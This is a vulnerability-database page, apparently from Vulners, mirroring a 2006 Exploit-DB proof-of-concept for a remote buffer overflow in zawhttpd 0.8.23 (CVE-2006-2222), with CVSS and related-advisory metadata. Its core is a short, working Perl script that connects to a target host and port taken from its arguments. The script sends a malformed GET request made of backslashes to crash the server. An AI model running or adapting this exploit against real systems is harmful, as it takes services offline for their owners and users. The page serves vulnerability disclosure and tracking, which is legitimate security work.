Lucene search
+L

zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)

🗓️ 04 May 2006 00:00:00Reported by Kamil SienickiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC) by Kamil 'K3' Sienick

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-2222
5 May 200619:00
cve
cvelist
Cvelist
CVE-2006-2222
5 May 200619:00
cvelist
euvd
EUVD
EUVD-2006-2223
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-2222
5 May 200619:02
nvd
prion
Prion
Buffer overflow
5 May 200619:02
prion
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
                PeerAddr => $ARGV[0],
                PeerPort => $ARGV[1],
                Proto => "TCP"))
{
        print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
        print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
        close($socket);
}
else
{
        print "perl zawhttpd.pl localhost 80 \n";
        print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
#EoF

# milw0rm.com [2006-05-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 May 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03999
31